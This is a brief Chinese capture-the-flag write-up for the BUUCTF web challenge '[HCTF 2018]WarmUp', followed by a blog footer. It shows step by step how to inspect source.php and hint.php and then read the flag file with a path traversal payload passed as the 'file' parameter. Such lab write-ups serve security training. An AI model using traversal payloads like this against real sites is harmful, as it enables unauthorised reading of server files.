BUUCTF-WEB:[HCTF 2018]WarmUp
刷題平臺:https://buuoj.cn
題目地址:https://buuoj.cn/challenges#[HCTF%202018]WarmUp
解題步驟:
1、訪問:http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn
2、出現一個滑稽頭像并按快捷鍵F12查看源碼,出現提示信息source.php
3、將/source.php復制到地址欄已有地址后面
http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/source.php
訪問后可看見PHP源碼(可以把源碼復制到本地后去分析)
4、http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/hint.php——》http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/ffffllllaaaagggg
5、返回上一步進行傳參http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=hint.php
http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=ffffllllaaaagggg
6、http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=hint.php?../…/…/…/…/ffffllllaaaagggg
correct!
總結
以上是生活随笔為你收集整理的BUUCTF-WEB:[HCTF 2018]WarmUp的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 字节序转换 oracle,Oracle1
- 下一篇: android 短信编解码方式,中移短信